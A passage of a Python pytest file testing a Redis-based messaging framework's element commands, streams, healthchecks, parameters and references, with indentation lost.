Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
proc = Process(target=responder.command_loop, kwargs={"n_workers": 2})
proc.start()
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
proc.join()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
def test_command_response_n_workers_2_use_threads(self, caller, responder):
"""
Element sends command and responder returns response if we use threads
for workers instead of processes.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
proc = Process(
target=responder.command_loop, kwargs={"n_workers": 2, "use_procs": False}
)
proc.start()
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
proc.join()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
def test_command_response_legacy_serialized(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
def add_1_serialized(data):
return Response(data + 1, serialize=True)
responder.command_add("add_1_3", add_1_serialized, deserialize=True)
self._element_start(responder, caller)
response = caller.command_send(
responder_name, "add_1_3", 0, serialize=True, deserialize=True
)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == 1
def test_command_response_mixed_serialization(self, caller, responder):
"""
Ensures that command and response are serialized correctly based on
serialization specified.
"""
caller, caller_name = caller
responder, responder_name = responder
def add_1_arrow_serialized(data):
return Response(data + 1, serialization="arrow")
responder.command_add(
"test_command", add_1_arrow_serialized, serialization="msgpack"
)
assert "test_command" in responder.handler_map
assert responder.handler_map["test_command"]["serialization"] == "msgpack"
self._element_start(responder, caller)
response = caller.command_send(
responder_name, "test_command", 123, serialization="msgpack"
)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == 124
def test_listen_on_streams(self, caller, responder):
"""
Creates two responders publishing entries on their respective streams
with a caller listening on those streams and publishing data to a
new stream. This test ensures that the new stream contains all the
data from the responders.
"""
caller, caller_name = caller
responder, responder_name = responder
responder_0_name = responder_name + "_0"
responder_1_name = responder_name + "_1"
responder_0 = self._element_create(responder_0_name)
responder_1 = self._element_create(responder_1_name)
entries = set()
def entry_write_loop(responder, stream_name, data):
# Wait until both responders and the caller are ready
while -1 not in entries or -2 not in entries:
responder.entry_write(
stream_name, {"value": data - 2}, serialization="msgpack"
)
for i in range(10):
responder.entry_write(
stream_name, {"value": data}, serialization="msgpack"
)
data += 2
def add_entries(data):
entries.add(data["value"])
proc_responder_0 = Thread(
target=entry_write_loop,
args=(
responder_0,
"stream_0",
0,
),
)
proc_responder_1 = Thread(
target=entry_write_loop,
args=(
responder_1,
"stream_1",
1,
),
)
stream_handlers = [
StreamHandler(responder_0_name, "stream_0", add_entries),
StreamHandler(responder_1_name, "stream_1", add_entries),
]
thread_caller = Thread(
target=caller.entry_read_loop,
args=(
stream_handlers,
None,
1000,
True,
),
daemon=True,
)
thread_caller.start()
proc_responder_0.start()
proc_responder_1.start()
proc_responder_0.join()
proc_responder_1.join()
# Wait to give the caller time to handle all the data from the streams
thread_caller.join(5.0)
caller._rclient.delete(f"stream:{responder_0_name}:stream_0")
caller._rclient.delete(f"stream:{responder_1_name}:stream_1")
for i in range(20):
assert i in entries
self._element_cleanup(responder_0)
self._element_cleanup(responder_1)
def test_read_since(self, caller, responder):
"""
Sets the current timestamp as last_id and writes 5 entries to a stream.
Ensures that we can get 5 entries since the last id using
entry_read_since.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.entry_write("test_stream", {"data": None})
# Sleep so that last_id is later than the first entry
time.sleep(0.01)
last_id = responder._get_redis_timestamp()
# Sleep so that the entries are later than last_id
time.sleep(0.01)
for i in range(5):
responder.entry_write("test_stream", {"data": i})
        # Ensure this doesn't get an entry (because it's waiting for new entries
        # and they never come)
entries = caller.entry_read_since(responder_name, "test_stream")
assert len(entries) == 0
# Ensure this gets all entries
entries = caller.entry_read_since(responder_name, "test_stream", last_id="0")
assert len(entries) == 6
# Ensure we get the correct number of entries since the last_id
entries = caller.entry_read_since(responder_name, "test_stream", last_id)
assert len(entries) == 5
# Ensure that if we pass n, we get the n earliest entries since last_id
entries = caller.entry_read_since(responder_name, "test_stream", last_id, 2)
assert len(entries) == 2
assert entries[-1]["data"] == b"1"
# Ensure that last_id=='$' only gets new entries arriving after the call
q = Queue()
def wrapped_read(q):
q.put(caller.entry_read_since(responder_name, "test_stream", block=500))
proc = Process(target=wrapped_read, args=(q,))
proc.start()
time.sleep(
0.1
) # sleep to give the process time to start listening for new entries
responder.entry_write("test_stream", {"data": None})
entries = q.get()
responder.command_loop_shutdown()
proc.join()
proc.terminate()
assert len(entries) == 1
def test_parallel_read_write(self, caller, responder):
"""
Has the same responder class receiving commands on 1 thread,
while publishing to a stream on a 2nd thread at high volume.
Meanwhile, a caller quickly sends a series of commands to the responder
and verifies we get valid results back.
Ensures that we can safely send and receive using the same element class
without concurrency issues.
"""
caller, caller_name = caller
responder, responder_name = responder
responder_0_name = responder_name + "_0"
responder_0 = self._element_create(responder_0_name)
def no_op_serialized(data):
"""
NO_OP command responds with whatever data it receives
"""
return Response(data, serialization="msgpack")
responder_0.command_add("no_op", no_op_serialized, serialization="msgpack")
# Entry write loop mimics high volume publisher
def entry_write_loop(responder):
for i in range(3000):
responder.entry_write("stream_0", {"value": 0}, serialization="msgpack")
time.sleep(0.0001)
# Command loop thread to handle incoming commands
self._element_start(responder_0, caller)
# Entry write thread to publish a whole bunch to a stream
entry_write_thread = Thread(
target=entry_write_loop, args=(responder_0,), daemon=True
)
entry_write_thread.start()
# Send a bunch of commands to responder and you should get valid
# responses back, even while its busy publishing to a stream
try:
for i in range(20):
response = caller.command_send(
responder_0_name, "no_op", 1, serialization="msgpack"
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == 1
finally:
# Cleanup threads
entry_write_thread.join()
self._element_cleanup(responder_0)
del responder_0
def test_healthcheck_default(self, caller, responder):
"""
Verify default healthcheck
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
response = caller.command_send(responder_name, HEALTHCHECK_COMMAND)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b""
self._element_cleanup(responder)
def test_healthcheck_success(self, caller, responder):
"""
Verify a successful response from a custom healthcheck
"""
caller, caller_name = caller
responder = self._element_create("healthcheck_success_responder")
responder.healthcheck_set(lambda: Response(err_code=0, err_str="We're good"))
self._element_start(responder, caller)
response = caller.command_send(
"healthcheck_success_responder", HEALTHCHECK_COMMAND
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b""
assert response["err_str"] == "We're good"
self._element_cleanup(responder)
def test_healthcheck_failure(self, caller, responder):
"""
Verify a failed response from a custom healthcheck
"""
responder = self._element_create("healthcheck_failure_responder")
caller, caller_name = caller
responder.healthcheck_set(
lambda: Response(err_code=5, err_str="Camera is unplugged")
)
self._element_start(responder, caller, do_healthcheck=False)
response = caller.command_send(
"healthcheck_failure_responder", HEALTHCHECK_COMMAND
)
assert response["err_code"] == 5 + ATOM_USER_ERRORS_BEGIN
assert response["data"] == b""
assert response["err_str"] == "Camera is unplugged"
self._element_cleanup(responder)
def test_wait_for_elements_healthy(self, caller, responder):
"""
Verify wait_for_elements_healthy success/failure cases
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
def wait_for_elements_check(caller, elements_to_check):
caller.wait_for_elements_healthy(elements_to_check)
wait_for_elements_thread = Thread(
target=wait_for_elements_check, args=(caller, [responder_name]), daemon=True
)
wait_for_elements_thread.start()
# If elements reported healthy, call should have returned quickly and
# thread should exit
wait_for_elements_thread.join(0.5)
assert not wait_for_elements_thread.is_alive()
wait_for_elements_thread = Thread(
target=wait_for_elements_check,
args=(caller, [responder_name, "test_responder_2"]),
daemon=True,
)
wait_for_elements_thread.start()
# 1 of these elements is missing, so thread is busy and this join call
# should timeout retrying
wait_for_elements_thread.join(0.5)
assert wait_for_elements_thread.is_alive()
try:
responder_2 = self._element_create("test_responder_2")
self._element_start(responder_2, caller, do_healthcheck=False)
# test_responder_2 is alive now, so both healthchecks should succeed
# and thread should exit roughly within the retry interval
wait_for_elements_thread.join(HEALTHCHECK_RETRY_INTERVAL + 1.0)
assert not wait_for_elements_thread.is_alive()
finally:
# Cleanup threads
self._element_cleanup(responder_2)
del responder_2
self._element_cleanup(responder)
def test_version_command(self, caller, responder):
"""
Verify the response from the get_element_version command
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
response = caller.command_send(
responder_name, VERSION_COMMAND, serialization="msgpack"
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == {
"version": float(".".join(VERSION.split(".")[:-1])),
"language": LANG,
}
response2 = caller.get_element_version(responder_name)
assert response == response2
self._element_cleanup(responder)
def test_command_list_command(self, caller, responder):
"""
Verify the response from the COMMAND_LIST_COMMAND command
"""
caller, caller_name = caller
responder, responder_name = responder
# Test with no commands
no_command_responder = self._element_create("no_command_responder")
self._element_start(no_command_responder, caller)
assert (
caller.command_send(
no_command_responder.name, COMMAND_LIST_COMMAND, serialization="msgpack"
)["data"]
== []
)
self._element_cleanup(no_command_responder)
del no_command_responder
responder = self._element_create("responder_with_commands")
# Add commands to responder
responder.command_add("foo_func1", lambda data: data)
responder.command_add(
"foo_func2", lambda: None, timeout=500, serialization="msgpack"
)
responder.command_add(
"foo_func3", lambda x, y: x + y, timeout=1, serialization="msgpack"
)
self._element_start(responder, caller)
# Test with three commands
response = caller.command_send(
responder.name, COMMAND_LIST_COMMAND, serialization="msgpack"
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == ["foo_func1", "foo_func2", "foo_func3"]
self._element_cleanup(responder)
def test_get_all_commands_with_version(self, caller, responder):
"""
Ensure get_all_commands only queries support elements.
"""
caller, caller_name = caller
responder, responder_name = responder
# Change responder reported version
responder.handler_map[VERSION_COMMAND]["handler"] = lambda: Response(
data={"language": "Python", "version": 0.2}, serialization="msgpack"
)
# Create element with normal, supported version
responder2_name = responder_name + "_2"
responder2 = self._element_create(responder2_name)
# Add commands to both responders and start command loop
responder.command_add("foo_func0", lambda data: data)
responder2.command_add(
"foo_func0", lambda: None, timeout=500, serialization="msgpack"
)
responder2.command_add(
"foo_func1", lambda x, y: x + y, timeout=1, serialization="msgpack"
)
self._element_start(responder, caller)
self._element_start(responder2, caller)
# Retrieve commands
commands = caller.get_all_commands(
element_name=[responder_name, responder2_name]
)
# Do not include responder's commands as the version is too low
desired_commands = [
f"{responder2_name}:foo_func0",
f"{responder2_name}:foo_func1",
]
assert commands == desired_commands
self._element_cleanup(responder)
self._element_cleanup(responder2)
del responder2
def test_get_all_commands(self, caller, responder):
"""
Verify the response from the get_all_commands command
"""
caller, caller_name = caller
responder, responder_name = responder
# Test with no available commands
assert caller.get_all_commands() == []
# Set up two responders
test_name_1, test_name_2 = responder_name + "_1", responder_name + "_2"
responder1, responder2 = (
self._element_create(test_name_1),
self._element_create(test_name_2),
)
proc1_function_data = [
("foo_func0", lambda x: x + 3),
("foo_func1", lambda: None, 10, "arrow"),
("foo_func2", lambda x: None),
]
proc2_function_data = [
("foo_func0", lambda y: y * 3, 10),
("other_foo0", lambda y: None, 3, "msgpack"),
("other_foo1", lambda: 5),
]
# Add functions
for data in proc1_function_data:
responder1.command_add(*data)
for data in proc2_function_data:
responder2.command_add(*data)
self._element_start(responder1, caller)
self._element_start(responder2, caller)
# True function names
responder1_function_names = [f"{test_name_1}:foo_func{i}" for i in range(3)]
responder2_function_names = [
f"{test_name_2}:foo_func0",
f"{test_name_2}:other_foo0",
f"{test_name_2}:other_foo1",
]
# Either order of function names is fine for testing all function names
command_list = caller.get_all_commands()
assert (
command_list == responder1_function_names + responder2_function_names
or command_list == responder2_function_names + responder1_function_names
)
# Test just functions for 1
command_list = caller.get_all_commands(test_name_1)
assert command_list == responder1_function_names
# Test just functions for 2
command_list = caller.get_all_commands(test_name_2)
assert command_list == responder2_function_names
self._element_cleanup(responder1)
self._element_cleanup(responder2)
del responder1
del responder2
def test_no_ack(self, caller, responder):
"""
Element sends command and responder does not acknowledge.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
response = caller.command_send(responder_name, "add_1", 0)
assert response["err_code"] == ATOM_COMMAND_NO_ACK
def test_unsupported_command(self, caller, responder):
"""
Element sends command that responder does not have.
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
response = caller.command_send(responder_name, "add_1", 0)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_COMMAND_UNSUPPORTED
def test_command_timeout(self, caller, responder):
"""
Element sends command to responder that does not return data within the
timeout.
"""
caller, caller_name = caller
responder, responder_name = responder
# Set a timeout of 10 ms
responder.command_add("sleep_ms", sleep_ms, 10, serialization="msgpack")
self._element_start(responder, caller)
response = caller.command_send(
responder_name, "sleep_ms", 1000, serialization="msgpack"
)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_COMMAND_NO_RESPONSE
def test_handler_returns_not_response(self, caller, responder):
"""
Element calls command from responder that does not return an object of
type Response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("ret_not_response", lambda x: 0)
self._element_start(responder, caller)
response = caller.command_send(responder_name, "ret_not_response", None)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_CALLBACK_FAILED
# TODO: come back and fix logging tests once that's sorted
# def test_log(self, caller):
# """
# Writes a log with each severity level and ensures that all the logs
# exist.
# """
# caller, caller_name = caller
# for i, severity in enumerate(LogLevel):
# caller.log(severity, f"severity {i}", stdout=False)
# logs = caller._rclient.xread({"log": 0})[0][1]
# logs = logs[-8:]
# for i in range(8):
# assert logs[i][1][b"msg"].decode() == f"severity {i}"
def test_parameter_write(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data)
param_data = caller.parameter_read(key)
assert param_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_read_field(self, caller):
"""
Writes parameter with multiple fields; verifies that
a single field can be successfully read.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data)
param_data = caller.parameter_read(key, fields="str2")
assert param_data == {b"str2": b"goodbye"}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_msgpack(self, caller):
"""
Writes parameter with msgpack serialization.
Verifies it is successfully deserialized when read.
"""
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, serialization="msgpack")
param_data = caller.parameter_read(key)
assert param_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_read_msgpack_field(self, caller):
"""
Writes parameter with multiple fields serialized with msgpack.
Verifies that a single field is successfully read and deserialized.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, serialization="msgpack")
param_data = caller.parameter_read(key, fields=["str2"])
assert param_data == {b"str2": b"goodbye"}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_override_true(self, caller):
"""
Writes parameter with override allowed. Updates one existing
field. Reads parameter and checks field was updated.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data)
new_data = {b"str2": b"goodbye again"}
updated = caller.parameter_write(key, new_data)
assert updated == [b"str2"]
new_data = caller.parameter_read(key)
assert new_data == {b"str1": b"hello, world!", b"str2": b"goodbye again"}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_override_false(self, caller):
"""
        Writes parameter with override not allowed. Tries updating
existing field and verifies that exception is raised. Reads
parameter and checks field was not updated.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, override=False)
new_data = {b"str2": b"goodbye again"}
with pytest.raises(Exception):
_ = caller.parameter_write(key, new_data)
current_data = caller.parameter_read(key)
assert current_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_override_false_allows_new_key(self, caller):
"""
Writes parameter with override not allowed. Tries adding new field
to parameter and verifies new field was successfully added.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, override=False)
new_data = {b"str3": b"goodbye again"}
new_fields = caller.parameter_write(key, new_data)
assert new_fields == [b"str3"]
new_data = caller.parameter_read(key)
assert new_data == {
b"str1": b"hello, world!",
b"str2": b"goodbye",
b"str3": b"goodbye again",
}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_new_serialization_raises_error(self, caller):
"""
Writes parameter with msgpack serialization. Attempts to add
new field with no serialization; verifies that exception is raised
and existing parameter is not changed.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, serialization="msgpack")
new_data = {b"str3": b"goodbye again"}
with pytest.raises(Exception):
_ = caller.parameter_write(key, new_data)
current_data = caller.parameter_read(key)
assert current_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_get_override(self, caller):
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, override=False)
override = caller.parameter_get_override(key)
assert override == "false"
success = caller.parameter_delete(key)
assert success == True
def test_parameter_get_override_doesnt_exist(self, caller):
caller, caller_name = caller
key = "my_param"
with pytest.raises(Exception):
_ = caller.parameter_get_override(key)
def test_parameter_default_timeout_is_none(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms == -1
success = caller.parameter_delete(key)
assert success == True
def test_parameter_get_timeout_ms(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=1000)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms > 0 and remaining_ms <= 1000
time.sleep(0.1)
still_remaining_ms = caller.parameter_get_timeout_ms(key)
assert (still_remaining_ms < remaining_ms) and (still_remaining_ms > 0)
success = caller.parameter_delete(key)
assert success == True
def test_parameter_update_timeout_ms(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=1000)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms > 0 and remaining_ms <= 1000
caller.parameter_update_timeout_ms(key, 10000)
updated_ms = caller.parameter_get_timeout_ms(key)
assert (updated_ms > 1000) and (updated_ms <= 10000)
success = caller.parameter_delete(key)
assert success == True
def test_parameter_remove_timeout(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=1000)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms > 0 and remaining_ms <= 1000
caller.parameter_update_timeout_ms(key, 0)
updated_ms = caller.parameter_get_timeout_ms(key)
assert updated_ms == -1
success = caller.parameter_delete(key)
assert success == True
def test_parameter_delete(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=0)
param_data = caller.parameter_read(key)
assert param_data == data
timeout_ms = caller.parameter_get_timeout_ms(key)
assert timeout_ms == -1
success = caller.parameter_delete(key)
assert success == True
del_data = caller.parameter_read(key)
assert del_data is None
def test_parameter_delete_missing(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=0)
success = caller.parameter_delete(key)
assert success == True
del_data = caller.parameter_read(key)
assert del_data is None
success = caller.parameter_delete(key)
assert success == False
def test_parameter_list(self, caller):
"""
Writes parameters, verifies that parameter_list lists exactly
the parameters that exist at any point in time, and then cleans
up written parameters
"""
caller, caller_name = caller
assert len(caller.parameter_list()) == 0
keys = ["str1", "str2", "other"]
data = [
{b"k1": b"hello, world"},
{b"k1": b"hello, world!", b"str2": b"goodbye"},
{b"k3": b"hello"},
]
_ = caller.parameter_write(keys[0], data[0], serialization="msgpack")
assert set([keys[0]]) == set(caller.parameter_list())
assert [] == caller.parameter_list("str2")
assert [] == caller.parameter_list("other")
_ = caller.parameter_write(
keys[1],
data[1],
serialization="msgpack",
)
assert set(keys[0:2]) == set(caller.parameter_list())
assert [] == caller.parameter_list("other")
_ = caller.parameter_write(keys[2], data[2], serialization="msgpack")
assert set(keys) == set(caller.parameter_list())
for i, key in enumerate(keys):
success = caller.parameter_delete(key)
assert success == True
assert set(keys[i + 1 :]) == set(caller.parameter_list())
def test_parameter_list_pattern_matching(self, caller):
"""
Writes 3 parameters, tests that parameter_list can correctly
return parameters matching a few patterns, as described in
https://redis.io/commands/KEYS, then deletes the parameters.
"""
caller, caller_name = caller
keys = ["str1", "str2", "spr2", "sppr2"]
data = [
{b"k1": b"hello, world"},
{b"k1": b"hello, world!", b"str2": b"goodbye"},
{b"k3": b"hello"},
{b"k1": b"hello, world!", b"str2": b"goodbye"},
]
for i, key in enumerate(keys):
_ = caller.parameter_write(key, data[i], serialization="msgpack")
assert set(keys) == set(caller.parameter_list())
assert set(keys[0:2]) == set(caller.parameter_list("str*"))
assert ["spr2"] == caller.parameter_list("spr2")
assert ["str1"] == caller.parameter_list("str1")
assert ["str2"] == caller.parameter_list("str2")
assert [] == caller.parameter_list("str")
assert set(["str2", "spr2"]) == set(caller.parameter_list("s?r2"))
assert set(["str2", "spr2", "sppr2"]) == set(caller.parameter_list("s*r2"))
assert ["str1"] == caller.parameter_list("str[^2]")
assert [] == caller.parameter_list("str[4-9]")
for key in keys:
success = caller.parameter_delete(key)
assert success == True
def test_reference_basic(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data)[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_user_key(self, caller):
caller, caller_name = caller
data = b"hello, world!"
key = "my_string"
ref_id = caller.reference_create(data, keys=key)[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_doesnt_exist(self, caller):
caller, caller_name = caller
ref_id = "nonexistent"
ref_data = caller.reference_get(ref_id)[0]
assert ref_data is None
def test_reference_legacy_serialization(self, caller):
caller, caller_name = caller
data = {
"hello": "world",
"atom": 123456,
"some_obj": {"references": "are fun!"},
}
ref_id = caller.reference_create(data, serialize=True)[0]
ref_data = caller.reference_get(ref_id, deserialize=True)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_arrow(self, caller):
"""
Creates references serialized with Apache Arrow; gets references and
deserializes based on serialization method embedded within reference
key.
"""
caller, caller_name = caller
data = {
"hello": "world",
"atom": 123456,
"some_obj": {"references": "are fun!"},
}
ref_id = caller.reference_create(data, serialization="arrow")[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_msgpack_dne(self, caller):
caller, caller_name = caller
ref_id = "nonexistent"
ref_data = caller.reference_get(ref_id, serialization="msgpack")[0]
assert ref_data is None
def test_reference_multiple(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"robots are fun!"]
ref_ids = caller.reference_create(*data)
ref_data = caller.reference_get(*ref_ids)
for i in range(len(data)):
assert ref_data[i] == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_multiple_user_keys(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"robots are fun!"]
ref_ids = caller.reference_create(*data, keys=["ref1", "ref2"])
assert "ref1" in ref_ids[0] and "ref2" in ref_ids[1]
ref_data = caller.reference_get(*ref_ids)
for i in range(len(data)):
assert ref_data[i] == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_multiple_mismatch_keys(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"robots are fun!"]
with pytest.raises(Exception):
_ = caller.reference_create(*data, keys=["ref1"])
def test_reference_multiple_mismatch_keys_2(self, caller):
caller, caller_name = caller
data = [b"hello, world!"]
with pytest.raises(Exception):
_ = caller.reference_create(*data, keys=["ref1", "ref2"])
def test_reference_multiple_msgpack(self, caller):
caller, caller_name = caller
data = [
{"hello": "world", "atom": 123456, "some_obj": {"references": "are fun!"}},
True,
]
ref_ids = caller.reference_create(*data, serialization="msgpack")
ref_data = caller.reference_get(*ref_ids)
for i in range(len(data)):
assert ref_data[i] == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_multiple_mixed_serialization(self, caller):
caller, caller_name = caller
data = [{"hello": "world"}, b"123456"]
ref_ids = []
ref_ids.extend(caller.reference_create(data[0], serialization="msgpack"))
ref_ids.extend(caller.reference_create(data[1], serialization="none"))
ref_data = caller.reference_get(*ref_ids)
for ref, orig in zip(ref_data, data):
assert ref == orig
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_get_timeout_ms(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=1000)[0]
ref_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_remaining_ms > 0 and ref_remaining_ms <= 1000
time.sleep(0.1)
ref_still_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert (ref_still_remaining_ms < ref_remaining_ms) and (
ref_still_remaining_ms > 0
)
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_update_timeout_ms(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=1000)[0]
ref_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_remaining_ms > 0 and ref_remaining_ms <= 1000
caller.reference_update_timeout_ms(ref_id, 10000)
ref_updated_ms = caller.reference_get_timeout_ms(ref_id)
assert (ref_updated_ms > 1000) and (ref_updated_ms <= 10000)
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_remove_timeout(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=1000)[0]
ref_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_remaining_ms > 0 and ref_remaining_ms <= 1000
caller.reference_update_timeout_ms(ref_id, 0)
ref_updated_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_updated_ms == -1
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_delete(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=0)[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
ref_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_ms == -1
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
del_data = caller.reference_get(ref_id)[0]
assert del_data is None
def test_reference_delete_multiple(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"test"]
ref_ids = caller.reference_create(*data, timeout_ms=0)
ref_data = caller.reference_get(*ref_ids)
assert ref_data[0] == data[0]
assert ref_data[1] == data[1]
ref_ms = caller.reference_get_timeout_ms(ref_ids[0])
assert ref_ms == -1
ref_ms = caller.reference_get_timeout_ms(ref_ids[1])
assert ref_ms == -1
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
del_data = caller.reference_get(*ref_ids)
assert del_data[0] is None
assert del_data[1] is None
def test_reference_delete_single_missing(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"test"]
ref_ids = caller.reference_create(*data, timeout_ms=0)
ref_data = caller.reference_get(*ref_ids)
assert ref_data[0] == data[0]
assert ref_data[1] == data[1]
ref_ms = caller.reference_get_timeout_ms(ref_ids[0])
assert ref_ms == -1
ref_ms = caller.reference_get_timeout_ms(ref_ids[1])
assert ref_ms == -1
missing_str = "bad-reference"
ref_ids.append(missing_str)
success, failed = caller.reference_delete(*ref_ids)
assert success == False
assert failed == [missing_str]
def test_reference_delete_all_missing(self, caller):
caller, caller_name = caller
missing_references = ["ref-a", "ref-b", "ref-c", "ref-"]
success, failed = caller.reference_delete(*missing_references)
assert success == False
assert failed == missing_references
def test_reference_delete_msgpack(self, caller):
caller, caller_name = caller
data = {"msgpack": "data"}
ref_id = caller.reference_create(data, timeout_ms=0, serialization="msgpack")[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
ref_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_ms == -1
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
del_data = caller.reference_get(ref_id)[0]
assert del_data is None
def test_reference_expire(self, caller):
caller, caller_name = caller
data = {"msgpack": "data"}
ref_id = caller.reference_create(data, serialization="msgpack", timeout_ms=500)[
0
]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
time.sleep(0.5)
expired_data = caller.reference_get(ref_id)[0]
assert expired_data is None
